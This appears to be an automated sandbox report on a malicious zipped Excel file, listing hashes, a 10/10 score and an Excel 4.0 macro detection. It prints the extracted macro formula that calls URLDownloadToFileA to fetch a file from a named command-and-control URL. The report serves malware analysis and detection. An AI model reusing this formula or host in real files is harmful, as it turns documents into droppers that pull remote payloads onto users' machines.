General

  • Target

    5527146056155136.zip

  • Size

    11KB

  • MD5

    bda336dfdf5f1db4824bbe1650f7b7cc

  • SHA1

    6767e6b4ea3f2df27fa645af10424e86b8ab4041

  • SHA256

    bb855c66321ea9de7518e375451bb97aaf2e48277dc96384ef8f1ab34c61e1b0

  • SHA512

    e6b0913c54bf530bb6e6b16c7e2e0745e189083863304101b39abce7d64a166b5b4d121144e344a2289808905b5134b1c8e844cd7fe288e51120940c4a8bc06a

Score
10/10

Malware Config

Extracted

Rule
Excel 4.0 XLM Macro
C2

http://xjw10whta03ytgdi.com/inda.xls

Attributes
  • formulas

    =CALL("URLMon","URLDownloadToFileA","JJCCBB",0,"http://xjw10whta03ytgdi.com/inda.xls","..\fkruf.djr",0)

Signatures

  • Suspicious Office macro (1 IoC)

    Office document equipped with 4.0 macros.

Files

  • 5527146056155136.zip
    .zip

    Password: infected

  • db51470283d68b4eb4bcaa7ec2479a06d41503cd5862214f97e4f394748b36c3
    .xls windows office2003